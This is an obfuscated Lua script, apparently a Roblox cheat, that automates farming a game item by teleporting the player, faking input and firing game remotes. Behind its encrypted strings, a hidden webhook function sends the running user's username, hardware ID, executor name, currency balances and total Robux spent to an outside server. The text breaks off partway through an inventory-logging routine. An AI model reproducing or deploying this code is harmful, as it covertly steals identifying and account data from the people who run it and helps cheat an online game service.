--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x >= (P / 2)) then
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
repeat
	task.wait();
until game:IsLoaded() 
local LocalPlayer = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\225\207\218\60\227\169\212", "\126\177\163\187\69\134\219\167")).LocalPlayer;
local CG = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\0\194\56\192\219\54\196", "\156\67\173\74\165"));
local HTTP = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\28\163\93\6\143\35\84\34\190\74\19", "\38\84\215\41\118\220\70"));
local TS = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\100\1\39\23\240\99\19\48\4\247\83\19", "\158\48\118\66\114"));
local UIS = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\158\55\21\36\90\171\235\190\48\35\51\97\179\242\168\33", "\155\203\68\112\86\19\197"));
local VIM = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\112\212\36\232\85\121\233\209\72\205\35\232\109\121\235\249\65\216\36", "\152\38\189\86\156\32\24\133"));
if CG:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\207\67\174\72\251\69\166\95", "\38\156\55\199"), true) then
	CG:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\155\105\117\38\20\102\251\90", "\35\200\29\28\72\115\20\154"), true):Destroy();
end
if getgenv().Loop then
	Loop:Disconnect();
end
getgenv().Loop = nil;
getgenv().GlobalSwitch = 1;
local ThemeColor = Color3.fromRGB(77, 0, 255);
local CurseLocation = CFrame.new(Vector3.new(1966, 940, -1547));
local Target = CurseLocation;
local Curses = {LUAOBFUSACTOR_DECRYPT_STR_0("\51\170\219\202\153\63\33\89\140\222\205\142\41\38\28\173", "\84\121\223\177\191\237\76"),LUAOBFUSACTOR_DECRYPT_STR_0("\157\90\208\168\63\81\52", "\161\219\54\169\192\90\48\80"),LUAOBFUSACTOR_DECRYPT_STR_0("\123\77\16\53\70\76\7\44\9\97\21\55\90\71", "\69\41\34\96"),LUAOBFUSACTOR_DECRYPT_STR_0("\145\194\217\30\11\56\252\224\194\24\17\46", "\75\220\163\183\106\98")};
local Chests = {LUAOBFUSACTOR_DECRYPT_STR_0("\33\181\134\58\214\12", "\185\98\218\235\87"),LUAOBFUSACTOR_DECRYPT_STR_0("\249\61\53\227", "\202\171\92\71\134\190"),LUAOBFUSACTOR_DECRYPT_STR_0("\12\209\37\139", "\232\73\161\76"),LUAOBFUSACTOR_DECRYPT_STR_0("\151\220\69\88\16\191\216\80\68", "\126\219\185\34\61")};
local QuestRemote = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\62\203\78\126\119\116\242\243\9\202\109\102\113\101\242\224\9", "\135\108\174\62\18\30\23\147")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\132\236\58\199\17\173\50\211\179\237\7\196\28\187\63\194\165", "\167\214\137\74\171\120\206\83")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\160\254\59\73\200\166\136\251\51\90\253", "\199\235\144\82\61\152")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\44\24\176\63", "\75\103\118\217")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\244\81\98\2\176\29\194\71", "\126\167\52\16\116\217")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\236\39\33\140\187\30\233\205\29\37\146\162\16\255\205", "\156\168\78\64\224\212\121")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\53\200", "\174\103\142\197")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\117\32\90\59\46\122\241\87\36\80\63\48\91", "\152\54\72\63\88\69\62"));
local Slow, Count, SpawnedCurses, HitCount = 0, 0, false, 0;
local Living = workspace:WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\248\205\248\85\218\195", "\60\180\164\142"));
local SG = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\107\93\23\44\34\227\53\77\87", "\114\56\62\101\73\71\141"));
SG.Name = LUAOBFUSACTOR_DECRYPT_STR_0("\139\253\210\202\191\251\218\221", "\164\216\137\187");
SG.Parent = CG;
local MainFrame = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\244\244\48\191\163", "\107\178\134\81\210\198\158"), SG);
MainFrame.Size = UDim2.new(0.25, 0, 0.25, 0);
MainFrame.Position = UDim2.new(0.5, 0, 0.5, 0);
MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0);
MainFrame.BorderSizePixel = 0;
MainFrame.AnchorPoint = Vector2.new(0.5, 0.5);
MainFrame.BackgroundTransparency = 0;
MainFrame.ClipsDescendants = true;
MainFrame.Draggable = true;
MainFrame.Active = true;
local Constraint = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\13\39\163\213\186\61\13\150\244\171\44\7\141\229\165\54\29\150\212\171\49\0\150", "\202\88\110\226\166"), MainFrame);
Constraint.AspectRatio = 4;
local MainCorners = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\246\38\161\248\216\205\10\144", "\170\163\111\226\151"), MainFrame);
MainCorners.CornerRadius = UDim.new(1, 0);
local ButtonCover = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\55\34\179\53\75", "\73\113\80\210\88\46\87"), MainFrame);
ButtonCover.Size = UDim2.new(0.75, 0, 0.75, 0);
ButtonCover.Position = UDim2.new(0.13, 0, 0.5, 0);
ButtonCover.AnchorPoint = Vector2.new(0.5, 0.5);
ButtonCover.BackgroundColor3 = ThemeColor;
ButtonCover.BackgroundTransparency = 0;
ButtonCover.BorderSizePixel = 0;
local ButtonCover2 = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\167\62\204\31\226", "\135\225\76\173\114"), MainFrame);
ButtonCover2.Size = UDim2.new(0.6, 0, 0.6, 0);
ButtonCover2.Position = UDim2.new(0.13, 0, 0.5, 0);
ButtonCover2.AnchorPoint = Vector2.new(0.5, 0.5);
ButtonCover2.BackgroundColor3 = Color3.new(0, 0, 0);
ButtonCover2.BackgroundTransparency = 0;
ButtonCover2.BorderSizePixel = 0;
local ToggleButton = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\46\232\160\164\142\168\179\14\226\182", "\199\122\141\216\208\204\221"), MainFrame);
ToggleButton.Size = UDim2.new(0.75, 0, 0.75, 0);
ToggleButton.Position = UDim2.new(0.13, 0, 0.5, 0);
ToggleButton.AnchorPoint = Vector2.new(0.5, 0.5);
ToggleButton.BackgroundTransparency = 1;
ToggleButton.Text = "";
ToggleButton.BorderSizePixel = 0;
local ToggleConstraint = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\152\244\49\227\104\243\174\201\34\241\108\255\162\254\31\254\107\226\191\220\25\254\108", "\150\205\189\112\144\24"), ToggleButton);
ToggleConstraint.AspectRatio = 1;
local ToggleCorners = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\16\173\156\67\22\134\20\2", "\112\69\228\223\44\100\232\113"), ToggleButton);
ToggleCorners.CornerRadius = UDim.new(1, 0);
local ToggleConstraint2 = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\225\54\38\192\166\121\133\192\45\6\199\191\115\165\219\17\20\199\164\125\143\218\11", "\230\180\127\103\179\214\28"), ButtonCover);
ToggleConstraint2.AspectRatio = 1;
local ToggleCorners2 = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\185\44\124\73\246\79\229\158", "\128\236\101\63\38\132\33"), ButtonCover);
ToggleCorners2.CornerRadius = UDim.new(1, 0);
local ToggleConstraint3 = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\153\128\48\87\166\238\204\184\155\16\80\191\228\236\163\167\2\80\164\234\198\162\189", "\175\204\201\113\36\214\139"), ButtonCover2);
ToggleConstraint3.AspectRatio = 1;
local ToggleCorners3 = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\114\229\22\211\22\73\201\39", "\100\39\172\85\188"), ButtonCover2);
ToggleCorners3.CornerRadius = UDim.new(1, 0);
local Setter = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\153\125\161\148\31\172\122\188\140", "\83\205\24\217\224"), MainFrame);
Setter.Size = UDim2.new(0.72, 0, 0.75, 0);
Setter.Position = UDim2.new(0.61, 0, 0.5, 0);
Setter.AnchorPoint = Vector2.new(0.5, 0.5);
Setter.BackgroundColor3 = ThemeColor;
Setter.TextSize = Setter.AbsoluteSize.Y * 0.4;
Setter.BackgroundTransparency = 0;
Setter.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\213\209\196\51\225\215\204\36\166\227\196\51\225\192\223\112\192\196\223\48", "\93\134\165\173");
Setter.TextColor3 = Color3.new(0, 0, 0);
Setter.Font = Enum.Font.SourceSansBold;
Setter.BorderSizePixel = 0;
local SetterCorners = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\139\219\226\205\40\192\183\108", "\30\222\146\161\162\90\174\210"), Setter);
SetterCorners.CornerRadius = UDim.new(1, 0);
local function FingerQuest(Arg1, Arg2)
	local args = {[1]=LUAOBFUSACTOR_DECRYPT_STR_0("\214\66\113\19\224\92\79\59\240\75\99\30", "\106\133\46\16"),[2]=LUAOBFUSACTOR_DECRYPT_STR_0("\126\41\125\251\95\82\24\2\118\253\72\69\74", "\32\56\64\19\156\58")};
	QuestRemote:InvokeServer(unpack(args));
end
local function SellItems()
	local ItemTable = {};
	task.wait(0.2);
	for i, v in ipairs(LocalPlayer.Backpack:GetChildren()) do
		if (v:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\110\199\234\90", "\224\58\168\133\54\58\146")) and ((v.Name ~= "Sukuna's Finger") or (v.Name ~= LUAOBFUSACTOR_DECRYPT_STR_0("\126\67\69\189\69\135\149\31\74", "\107\57\54\43\157\21\230\231")))) then
			local Attributes = v:GetAttributes();
			ItemTable[i] = {Attributes[LUAOBFUSACTOR_DECRYPT_STR_0("\242\159\20\248\144\216", "\175\187\235\113\149\217\188")],Attributes[LUAOBFUSACTOR_DECRYPT_STR_0("\9\154\168\104", "\24\92\207\225\44\131\25")],1};
		end
	end
	local args = {[1]=LUAOBFUSACTOR_DECRYPT_STR_0("\105\223\185\79\16\80\74\193\179\73\15\95\94\223\179\127\30\113\71\250\172\73\22\110", "\29\43\179\216\44\123"),[2]=ItemTable};
	game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\143\220\48\64\180\218\33\88\184\221\19\88\178\203\33\75\184", "\44\221\185\64")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\51\226\88\83\122\2\230\92\90\119\44\232\76\74\127\4\244", "\19\97\135\40\63")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\133\82\58\47\31\48\173\87\50\60\42", "\81\206\60\83\91\79")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\101\165\217\102", "\196\46\203\176\18\79\163\45")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\139\39\108\8\45\248\234\171", "\143\216\66\30\126\68\155")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\153\192\2\219\246\166\197\247\163\203\8", "\129\202\168\109\171\165\195\183")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\16\125", "\134\66\56\87\184\190\116")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\15\56\14\181\24\231", "\85\92\81\105\219\121\139\65")):FireServer(unpack(args));
end
local function AddItem()
	task.wait(30);
	local args = {[1]={[LUAOBFUSACTOR_DECRYPT_STR_0("\220\183\84\108\104\218\240\160", "\191\157\211\48\37\28")]=true}};
	Hook(LUAOBFUSACTOR_DECRYPT_STR_0("\217\22\250\27\63\205\12", "\90\191\127\148\124"), LocalPlayer.Name);
	game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\74\130\62\27\113\132\47\3\125\131\29\3\119\149\47\16\125", "\119\24\231\78")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\176\40\181\70\213\67\16\150\40\161\103\211\68\4\142\40\182", "\113\226\77\197\42\188\32")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\17\24\253\161\10\23\247\190\59\17\241", "\213\90\118\148")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\112\32\189\66", "\45\59\78\212\54")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\35\83\145\157\143\45\168\227", "\144\112\54\227\235\230\78\205")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\154\38\25\249\222\79\188\58\22\207\213\73\165\33\12\249", "\59\211\72\111\156\176")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\124\162", "\77\46\231\131")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\147\64\179\77\147\90\160\69\180\64\185\82\163", "\32\218\52\214")):FireServer(unpack(args));
	task.wait(2);
end
local function Click()
	game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\124\18\33\164\248\179\68\78\75\19\2\188\254\162\68\93\75", "\58\46\119\81\200\145\208\37")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\25\137\32\160\160\190\55\63\137\52\129\166\185\35\39\137\35", "\86\75\236\80\204\201\221")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\89\79\126\145\206\138\113\74\118\130\251", "\235\18\33\23\229\158")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\123\180\200\175", "\219\48\218\161")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\215\116\110\95\210\76\229\247", "\128\132\17\28\41\187\47")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\44\61\16\63\116\15\34\19\46\110\4\32\16\51\94\4", "\61\97\82\102\90")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\158\8", "\105\204\78\203\43\167\55\126")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\131\163\49\27\58\10\215\68\177", "\49\197\202\67\126\115\100\167")):InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\26\84\202\58\133\116\75\35\79\208\39\209", "\62\87\59\191\73\224\54"));
end
local function MouseClick(X, Y)
	VIM:SendMouseButtonEvent(X, Y, 0, true, game, 0);
	task.wait();
	VIM:SendMouseButtonEvent(X, Y, 0, false, game, 0);
end
local function Press(K)
	VIM:SendKeyEvent(true, Enum.KeyCode[K], false, nil);
	task.wait();
	VIM:SendKeyEvent(false, Enum.KeyCode[K], false, nil);
end
local function Hook(Type, Message)
	local data = {[LUAOBFUSACTOR_DECRYPT_STR_0("\241\3\232\192\230\0\246\204\244", "\169\135\98\154")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\197\118\41\81", "\168\171\23\68\52\157\83")]=LUAOBFUSACTOR_DECRYPT_STR_0("\249\116\230\190\36\42\130", "\231\148\17\149\205\69\77"),[LUAOBFUSACTOR_DECRYPT_STR_0("\150\166\213\242\86\253\140\162", "\159\224\199\167\155\55")]=LUAOBFUSACTOR_DECRYPT_STR_0("\236\246\42\215\249\231\3\223\242\224\47\211\240\246\33", "\178\151\147\92"),[LUAOBFUSACTOR_DECRYPT_STR_0("\154\252\64\39\23", "\26\236\157\44\82\114\44")]=Message},{[LUAOBFUSACTOR_DECRYPT_STR_0("\36\47\216\94", "\59\74\78\181")]=LUAOBFUSACTOR_DECRYPT_STR_0("\49\200\74\95", "\211\69\177\58\58"),[LUAOBFUSACTOR_DECRYPT_STR_0("\161\228\107\252\232\201\187\224", "\171\215\133\25\149\137")]=LUAOBFUSACTOR_DECRYPT_STR_0("\250\205\36\255\225\36\195\86\248\216\55\231", "\34\129\168\82\154\143\80\156"),[LUAOBFUSACTOR_DECRYPT_STR_0("\147\179\63\30\77", "\233\229\210\83\107\40\46")]=Type}}};
	local s, e = pcall(function()
		local a = request({[LUAOBFUSACTOR_DECRYPT_STR_0("\244\80\62", "\101\161\34\82\182")]=LUAOBFUSACTOR_DECRYPT_STR_0("\224\25\77\238\200\184\205\97\233\29\80\176\217\237\150\41\224\2\74\234\149\225\141\35\167\26\92\252\211\237\141\37\167\92\8\174\140\176\214\119\177\90\13\168\143\178\212\122\184\92\11\174\148\239\209\57\241\88\84\243\206\180\138\44\177\10\91\173\212\233\133\38\186\2\0", "\78\136\109\57\158\187\130\226"),[LUAOBFUSACTOR_DECRYPT_STR_0("\22\58\248\245\59\45\234", "\145\94\95\153")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\222\194\26\193\75\185\233\128\32\204\94\178", "\215\157\173\116\181\46")]=LUAOBFUSACTOR_DECRYPT_STR_0("\52\164\155\254\211\54\181\159\251\213\59\251\129\225\213\59", "\186\85\212\235\146"),[LUAOBFUSACTOR_DECRYPT_STR_0("\227\148\2\246\54\252\81\216\128\2\247\54\224", "\56\162\225\118\158\89\142")]=LUAOBFUSACTOR_DECRYPT_STR_0("\5\82\150\169\38\143\93\85\153\247\33\219\11\3\147\173\114\221\89\92\151\254\32\218\5\7\197\169\35\142\93\82\193\250\118\129\12\87\149\174\116\217\8\80\196\173\113\143\5\1\150\170\119\139\93\83\195\251\116\128\8\1\193\252", "\184\60\101\160\207\66")},[LUAOBFUSACTOR_DECRYPT_STR_0("\19\141\120\165", "\220\81\226\28")]=game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\59\193\150\235\217\194\1\195\139\248\239", "\167\115\181\226\155\138")):JSONEncode(data),[LUAOBFUSACTOR_DECRYPT_STR_0("\207\39\243\84\116\117", "\166\130\66\135\60\27\17")]=LUAOBFUSACTOR_DECRYPT_STR_0("\116\101\253\65", "\80\36\42\174\21")});
	end);
end
local function FingerFarm()
	task.spawn(function()
		while (GlobalSwitch % 2) == 0 do
			task.wait();
			Slow = Slow + 1;
			local SelectAll = LocalPlayer.PlayerGui.UI.Gameplay.ChestRoll.SelectAll;
			local Close = LocalPlayer.PlayerGui.UI.Gameplay.ChestRoll.Close;
			if SelectAll.Visible then
				getconnections(SelectAll.MouseButton1Click)[1]:Fire();
			elseif Close.Visible then
				getconnections(Close.MouseButton1Click)[1]:Fire();
			end
			if (LocalPlayer.Backpack:FindFirstChild("Sukuna's Finger") or LocalPlayer.Character:FindFirstChild("Sukuna's Finger")) then
				for i, v in ipairs(LocalPlayer.Backpack:GetChildren()) do
					if (v.Name == "Sukuna's Finger") then
						v.Parent = LocalPlayer.Character;
					end
				end
				Target = CurseLocation + Vector3.new(300, 300, 0);
				AddItem();
				task.wait(2);
				SellItems();
			elseif not Living:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\122\24\50\58\108\21\54\104\75\2", "\26\46\112\87")) then
				Count = 0;
				SpawnedCurses = false;
				for i, v in ipairs(Living:GetChildren()) do
					if v:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\148\44\175\113\179", "\212\217\67\203\20\223\223\37")) then
						if (table.find(Curses, v.Name) and v:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\146\152\165\211\180\130\161\214\136\130\167\198\138\140\186\198", "\178\218\237\200"))) then
							SpawnedCurses = true;
							Target = v.HumanoidRootPart.CFrame - (v.HumanoidRootPart.CFrame.LookVector * 3);
						end
					end
				end
				if not SpawnedCurses then
					for i, v in ipairs(workspace:GetChildren()) do
						if table.find(Chests, v.Name) then
							pcall(function()
								if ((v:FindFirstChildWhichIsA(LUAOBFUSACTOR_DECRYPT_STR_0("\148\180\245\213\134\180\244\196", "\176\214\213\134")).Position - LocalPlayer.Character.HumanoidRootPart.Position).Magnitude <= 500) then
									Target = v:FindFirstChildWhichIsA(LUAOBFUSACTOR_DECRYPT_STR_0("\214\172\165\209\152\87\75\224", "\57\148\205\214\180\200\54")).CFrame;
									task.wait(0.3);
								end
							end);
						end
					end
					Target = CurseLocation;
				end
				if ((Slow % 20) == 0) then
					FingerQuest();
				end
				if ((Slow % 300) == 0) then
					SellItems();
				end
			else
				local Bearer = Living:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\38\245\48\116\84\23\252\39\49\100", "\22\114\157\85\84"));
				Bearer:WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\236\222\30\197\83\249\161\192\249\28\203\73\198\169\214\223", "\200\164\171\115\164\61\150"));
				Target = Bearer.HumanoidRootPart.CFrame - (Bearer.HumanoidRootPart.CFrame.LookVector * 3);
				HitCount = HitCount + 1;
			end
		end
	end);
end
local function OnClick()
	GlobalSwitch = GlobalSwitch + 1;
	if ((GlobalSwitch % 2) == 0) then
		TS:Create(ButtonCover2, TweenInfo.new(0.1), {[LUAOBFUSACTOR_DECRYPT_STR_0("\141\253\25\64", "\227\222\148\99\37")]=UDim2.new(0, 0, 0, 0)}):Play();
		FingerFarm();
	else
		pcall(function()
			S:Disconnect();
		end);
		TS:Create(ButtonCover2, TweenInfo.new(0.1), {[LUAOBFUSACTOR_DECRYPT_STR_0("\0\91\72\243", "\153\83\50\50\150")]=UDim2.new(0.6, 0, 0.6, 0)}):Play();
	end
end
ToggleButton.MouseButton1Click:Connect(OnClick);
local LoopCounter = 1;
Loop = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\111\99\125\47\118\185\91\84\117\118", "\45\61\22\19\124\19\203")).Heartbeat:Connect(function()
	if ((GlobalSwitch % 2) == 0) then
		LoopCounter = LoopCounter + 1;
		if (not LocalPlayer.Character.Head:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\243\19\10\241\13\124\181\227\19\1\249\49\127\186\202\23\25", "\217\161\114\109\149\98\16")) or (#LocalPlayer.Cooldowns:GetChildren() >= 2)) then
			LocalPlayer.Character.HumanoidRootPart.CFrame = Target;
		else
			LocalPlayer.Character.HumanoidRootPart.CFrame = CurseLocation + Vector3.new(0, 50, 0);
		end
		Press("E");
		Click();
	end
end);
local function DataLog()
	local Data = LocalPlayer.Data;
	local HWID, Executor = LUAOBFUSACTOR_DECRYPT_STR_0("\60\47\54\121\252\82\29\53\54\120", "\20\114\64\88\28\220"), LUAOBFUSACTOR_DECRYPT_STR_0("\31\14\220\177\184\246\178\36\15\214", "\221\81\97\178\212\152\176");
	pcall(function()
		HWID = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\255\229\5\218\20\204\235\4\239\19\206\244\46\254\8\219\238\30\254", "\122\173\135\125\155")):GetClientId();
	end);
	pcall(function()
		Executor = identifyexecutor();
	end);
	local Datalog = LUAOBFUSACTOR_DECRYPT_STR_0("\206\139", "\168\228\161\96\217\95\81") .. LocalPlayer.Name .. LUAOBFUSACTOR_DECRYPT_STR_0("\145\155", "\55\187\177\78\60\79") .. "\nHWID: " .. HWID .. "\nExecutor: " .. Executor .. "\nUShards: " .. Data.Currency.Value .. "\nUCoins: " .. Data.UCoins.Value .. "\nUPoints: " .. Data.PremiumCurrency.Value .. "\nTotal Robux Spent: " .. Data.TimerProducts.TotalRobuxSpent.Value;
	Hook(LUAOBFUSACTOR_DECRYPT_STR_0("\33\193\88\248", "\224\77\174\63\139\38\175"), Datalog);
	print(Datalog);
end
local function InventoryLog()
	local InvRemote = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\182\68\72\34\141\66\89\58\129\69\107\58\139\83\89\41\129", "\78\228\33\56")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\252\123\162\15\140\205\127\166\6\129\227\113\182\22\137\203\109", "\229\174\30\210\99")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\48\227\143\69\221\60\58\16\236\129\84", "\89\123\141\230\49\141\93")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\216\127\255\24", "\42\147\17\150\108\112")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\60\163\63\105\238\235\10\181", "\136\111\198\77\31\135")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\43\7\177\83\179\240\24\187\27\58\162\68\171\237\20\172", "\201\98\105\199\54\221\132\119")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\139\42", "\204\217\108\227\65\98\85")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\121\198\225\204\56\197\83\208", "\160\62\163\149\133\76"));
	local ItemsTable = InvRemote:InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\255\180\8\34\234\216\182\8\33\215\217\178\20", "\163\182\192\109\79"));
	local SkinsTable = InvRemote:InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\7\45\9\206\220\58\48\5\206\225\59\52\25", "\149\84\70\96\160"));
	local AbilityTable = InvRemote:InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\25\4\4\225\49\18\20\196\54\16\8\227\44\9\31\244", "\141\88\102\109"));
	local Message = LUAOBFUSACTOR_DECRYPT_STR_0("\249\25", "\161\211\51\170\16\122\93\53") .. LocalPlayer.Name .. LUAOBFUSACTOR_DECRYPT_STR_0("\177\228", "\72\155\206\210");
	Message = Message .. "\nItems: ";
	for i, v in pairs(ItemsTable) do
		Message = Message .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\121\94\93\29\35\74\123\77\32\50\75\127", "\83\38\26\52\110")] .. LUAOBFUSACTOR_DECRYPT_STR_0("\24\11\103", "\38\56\119\71");
	end
	Message = Message .. "\nSkins: ";
	for i, v in pairs(SkinsTable) do
		if v[LUAOBFUSACTOR_DECRYPT_STR_0("\204\218\86\195\54\67\242\227\113\216\35\89", "\54\147\143\56\182\69")] then
			Message = Message .. LUAOBFUSACTOR_DECRYPT_STR_0("\237\180\241\92\204\195\128\243\116\159", "\191\182\225\159\41") .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\20\54\33\70\155\139\195\50\60\41\88\142", "\162\75\114\72\53\235\231")] .. LUAOBFUSACTOR_DECRYPT_STR_0("\204\32\4", "\98\236\92\36\130\51");
		else
			Message = Message .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\155\61\5\169\85\164\180\41\138\24\1\191", "\80\196\121\108\218\37\200\213")] .. LUAOBFUSACTOR_DECRYPT_STR_0("\64\111\66", "\234\96\19\98\31\43\110");
		end
	end
	Message = Message .. "\nAbilities: ";
	for i, v in pairs(AbilityTable) do
		if v[LUAOBFUSACTOR_DECRYPT_STR_0("\57\43\64\198\165\102\162\8\25\93", "\235\102\127\50\167\204\18")] then
